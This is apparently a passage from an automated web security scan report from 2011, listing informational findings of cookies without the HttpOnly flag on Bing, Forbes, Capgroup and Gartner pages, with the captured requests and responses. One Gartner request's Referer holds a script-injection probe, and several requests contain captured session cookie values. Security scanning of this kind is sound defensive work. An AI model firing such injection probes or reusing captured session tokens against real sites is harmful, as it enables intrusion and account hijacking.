Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjE1NzYyMjI0LjMwMTUwODgxAAAAAAABAAAAAQAAALpAzE26QMxNAQAAAAEAAAC6QMxNukDMTQAAAAA-; path=/; expires=Sun, 09-May-2021 20:19:06 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Thu, 12 May 2011 20:19:06 GMT
Connection: close

GIF89a.............!.......,...........D..;
18.91. http://www.bing.com/fd/fb/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/r?v=7_04_0_925756&sId=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bing.com/search?q=gigablast.com&src=ie9tr
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: FBB=R=0; SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; _SS=SID=357505634DE040F7AAB78C84F4F41453&CW=1067&CH=808; RMS=F=OAAg&A=QAAAAAAAAAAQAAAQB

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Thu, 12 May 2011 15:13:54 GMT
Connection: close
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:54 GMT; domain=.bing.com; path=/
Content-Length: 2175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
18.92. http://www.bing.com/fd/ls/GLinkPing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/GLinkPing.aspx?IG=0a2bc88e712d46c3bff774df04608da4&CID=F741A5D3C8544F77A0B57D8439E7E06E&PM=Y&ID=SERP,5074.1 HTTP/1.1
Accept: */*
Referer: http://www.bing.com/search?q=gigablast.com&src=ie9tr
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; _SS=SID=357505634DE040F7AAB78C84F4F41453&CW=1067&CH=808; RMS=F=OAAg&A=QAAAAAAAAAAQAAAQB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Thu, 12 May 2011 15:13:58 GMT
Connection: close
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:58 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;
18.93. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=gigablast.com&src=ie9tr HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1766474&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c91dbe765356b43c2af9db971344153a4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Thu, 12 May 2011 15:13:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=357505634DE040F7AAB78C84F4F41453; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Content-Length: 39226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
18.94. http://www.capgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capgroup.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.capgroup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=www.capgroup.com&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Server: ""
Date: Thu, 12 May 2011 19:44:32 GMT
Content-length: 6771
Content-type: text/html
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1305229472.99731; path=/; expires=Sun, 09-May-2021 19:44:32 GMT
Last-modified: Fri, 29 Apr 2011 17:06:14 GMT
Etag: "1a73-4dbaf006"
Accept-ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" h
...[SNIP]...
18.95. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /feeds/ap/2009/05/26/ap6466854.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feeds/ap/2009/05/26/ap6466854.html HTTP/1.1
Host: www.forbes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/1.3.26
Set-Cookie: RMID=adc1d6f34dcc10e0; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.forbes.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
<title>Forbes.com File Not Found</title>
<script language="JavaScript">
var fdcchannel;
var fdcsponsor;
var globalPageType = "errorPage";
var displayedSection = "";
</script>
<d
...[SNIP]...
18.96. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/TechnicalSupportPhone.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/TechnicalSupportPhone.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.ptfe694%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E7999e454e36
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231838879:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:24:26 GMT
Content-Length: 11729
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U18C3401D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=9e2790be5044ed0b5aee1b9a3d4c85c7b051461b2195a5984dcc41fa; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

<!-- Changes to title and meta tags will be overwritten by tagging workflow -->
<!-- Please use the tagging UI to add
...[SNIP]...
18.97. http://www.gartner.com/5_about/company_information/images/privacy_disclosure_head2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /5_about/company_information/images/privacy_disclosure_head2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5_about/company_information/images/privacy_disclosure_head2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 07 Jan 2003 16:42:49 GMT
Content-Type: image/gif
ETag: "pvce0f484a74f3dd9667364e623e97a91c"
Expires: Fri, 10 Jun 2011 00:58:05 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158739.RA0.G26D16.U10D492E1].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:18 GMT
Age: 4188
Content-Length: 1072
Set-Cookie: TS83f541=2cfe20be37ed3b2218785cd692163abc861d2d5cbf5986e84dcc422e; Path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...
18.98. http://www.gartner.com/5_about/news/css/content.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /5_about/news/css/content.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5_about/news/css/content.css;pvef7588a4442ef8e9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 28 Oct 2008 13:45:46 GMT
Content-Type: text/css
ETag: "pvef7588a4442ef8e9ab21a2f14e293111"
Expires: Sat, 29 Oct 2011 04:18:45 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UF513B1E2].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:21:51 GMT
Age: 897
Set-Cookie: TS83f541=7ff2e65e12014345fc580620f3a46dc946aba0eba33b0e324dcc415e; Path=/
Content-Length: 770

/*@import url("http://blog.gartner.com/blog/css/blog_common.css");*/

/*
there was no css file used across all blogs, blog_common.css is imported into the following style sheets so that there can
...[SNIP]...
18.99. http://www.gartner.com/7_search/js/Options.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /7_search/js/Options.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7_search/js/Options.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:40 GMT
Content-Type: application/x-javascript
ETag: "pv38f1d6142828f8281d0a1f2b57582550"
Expires: Thu, 09 Jun 2011 14:37:36 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UAF1B5899].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:24:58 GMT
Age: 6248
Set-Cookie: TS83f541=b5dd1f43fc8bdd832f72cd916000e864097224eb69f4ab6a4dcc4219; Path=/
Content-Length: 12076

function initializePage(showBrowseHeader, showAdvancedHeader, searchOperation) {

   t0_on = new Image();
   t0_off = new Image();
   t1_on = new Image();
   t1_off = new Image();
   t2_on = new Image();
   t2
...[SNIP]...
18.100. http://www.gartner.com/css/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /css/menu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/menu.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:39 GMT
Content-Type: text/css
ETag: "pve46d01409bc81ef48beecf87c0796627"
Expires: Fri, 03 Jun 2011 20:28:59 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U6C92B048].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:04 GMT
Age: 6072
Set-Cookie: TS83f541=b85c248560b252fd5ce0b7a56a60c2f5fcb9723f3fd00f214dcc421f; Path=/
Content-Length: 2826


.borderCell {background-color:#999999;}
.menuGray {background-color:#bbbbbb;}
/*.contentCell {background-color:#bbbbbb;}*/


#logo {position:absolute; top:1px; left:163px; height:30px; width:130px; c
...[SNIP]...
18.101. http://www.gartner.com/css/win/homepage.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /css/win/homepage.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/win/homepage.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:39 GMT
Content-Type: text/css
ETag: "pv3d95e8aac8ed4dada0117cb69cefab55"
Expires: Fri, 10 Jun 2011 04:46:10 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UF2DB39DE].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:07 GMT
Age: 2238
Set-Cookie: TS83f541=f7794403316b99d489b6ad92de237ad60306315615d47c8b4dcc4223; Path=/
Content-Length: 10425

.mainNavLink { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9pt; color: #FFFFFF; text-decoration: none}
.mainRightNavLink { font-family: Verdana, Arial, Helvetica, sans-serif; font
...[SNIP]...
18.102. http://www.gartner.com/css/win/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /css/win/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/win/main.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:39 GMT
Content-Type: text/css
ETag: "pv12da5cf19e09ce8f4b610e80c9e18ff9"
Expires: Tue, 07 Jun 2011 17:35:13 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U9DDA6B53].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:07 GMT
Age: 2504
Set-Cookie: TS83f541=72731bede4d3f248e65f5a0e0f737159fe2980646ae7f83a4dcc4223; Path=/
Content-Length: 10380

.signInHead { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-size: 13px; color: #FFFFFF; text-decoration: none; cursor:default}
.signInText { font-family: Verdana, Aria
...[SNIP]...
18.103. http://www.gartner.com/css/win/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /css/win/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/win/navigation.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:40 GMT
Content-Type: text/css
ETag: "pvacd59ed5686c87dda664a88467cd4005"
Expires: Tue, 07 Jun 2011 06:37:16 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U4E2E4932].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:07 GMT
Age: 2531
Set-Cookie: TS83f541=96c50b5d61ec2dd6970da1488a363712cfcb2c02b9b8e29b4dcc4223; Path=/
Content-Length: 186

.cover {cursor:hand;}
.content {font-family:verdana,arial,helvetica; font-size:8pt;}
.pinstripe {background-image:url(/images/header/header_pinstripe.gif); background-repeat:repeat-x;}
18.104. http://www.gartner.com/images/homepage/gartner80.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /images/homepage/gartner80.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/gartner80.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:37 GMT
Content-Type: image/gif
ETag: "pvbc6ae4c45702347a9f5f27233263fd8d"
Expires: Sat, 11 Jun 2011 01:42:37 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158739.RA0.G26D16.UE71DE6C9].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:19 GMT
Age: 2524
Content-Length: 1072
Set-Cookie: TS83f541=5abfeb4b5c761b85e4605130ad2468391b1ca6049b4511704dcc422f; Path=/

GIF89aP.......l...........c.;........{...g.j........A.............."v..p.b..-|.............)z....J...........5........N..............v........U..]..............p...../~.&x.f..Q.....F.....O..X.....1..
...[SNIP]...
18.105. http://www.gartner.com/images/popup_logo_071201.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /images/popup_logo_071201.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/popup_logo_071201.gif;pvcaf769761efec1a8 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:38 GMT
Content-Type: image/gif
ETag: "pvcaf769761efec1a8ba34d065b59635cc"
Expires: Sun, 06 Nov 2011 13:26:15 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A158739.RA0.G26D16.U8C00A3D8].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:21:39 GMT
Age: 154
Content-Length: 555
Set-Cookie: TS83f541=67a9717bbd733ee2c78e578636dde1d37fd0cfc8ad2963594dcc4153; Path=/

GIF89a...........a.F........{........!.......,..............K..I..8....`(j. .Az....p,.t..i..Ek...p.D.....ph....tz)....1EpY...x.............|.1l.........t.:p...''=.Y=.Y.9.i.Y..+.&...........|J..[;i..9.
...[SNIP]...
18.106. http://www.gartner.com/images/trans_pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /images/trans_pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/trans_pixel.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:39 GMT
Content-Type: image/gif
ETag: "pv1282c5386cdebf85f878a24937799ab7"
Expires: Tue, 07 Jun 2011 12:37:24 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158739.RA0.G26D16.U61A78762].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:11 GMT
Age: 2523
Content-Length: 49
Set-Cookie: TS83f541=e62e503d2ef96a73debbcfd06f8eaee09dfb530024c2878b4dcc4226; Path=/

GIF89a...................!.......,...........T..;
18.107. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:18:56 GMT
Set-Cookie: WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; domain=.gartner.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...
18.108. http://www.gartner.com/it/css/g1_header_footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /it/css/g1_header_footer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

